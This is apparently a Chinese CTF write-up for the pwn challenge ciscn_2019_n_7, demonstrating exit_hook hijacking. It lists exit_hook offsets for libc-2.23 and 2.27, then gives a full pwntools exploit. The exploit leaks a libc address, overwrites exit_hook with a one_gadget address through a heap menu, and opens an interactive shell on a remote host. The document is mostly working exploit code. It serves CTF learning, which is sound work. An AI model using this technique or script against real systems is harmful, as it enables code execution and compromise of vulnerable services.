ciscn_2019_n_7(劫持exit_hook)
这题记录一下劫持exit_hook的题型
exit_hook的位置:
1
2
3
4
5
6
7
8
| exit_hook的位置
在libc-2.23中
exit_hook = libc_base+0x5f0040+3848
exit_hook = libc_base+0x5f0040+3856
在libc-2.27中
exit_hook = libc_base+0x619060+3840
exit_hook = libc_base+0x619060+3848
|
不一定非要显式的exit,程序正常返回也可以执行到。
像这道题,如果直接调用菜单里的exit,会一并关掉输出流,导致无法回显。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
| from pwn import *
io = remote('node4.buuoj.cn',25032)
elf = ELF('./ciscn_2019_n_7')
context.log_level = "debug"
context.arch = 'amd64'
context.os = "linux"
libc = ELF('./libc-2.23-64.so')
def add(length,name):
io.recvuntil(b'choice-> ')
io.sendline(b'1')
io.recvuntil(b'Length:')
io.sendline(str(length))
io.recvuntil(b'name:')
io.send(name)
def edit(name,content):
io.recvuntil(b'choice-> ')
io.sendline(b'2')
io.recvuntil(b'name')
io.send(name)
io.recvuntil(b'contents')
io.send(content)
def leak():
io.recvuntil(b'choice-> ')
io.sendline(b'666')
leak()
io.recvuntil(b'0x')
put_got = int(io.recv(12),16)
libc_base = put_got-libc.sym['puts']
log.success('libc_base = > '+hex(libc_base))
exit_hook = libc_base + 0x5f0040 + 3848
one = libc_base + 0xf1147
add(0x20,b'a'*8+p64(exit_hook))
edit(b'a'*8,p64(one))
io.sendlineafter('-> \n','s')
io.interactive()
|
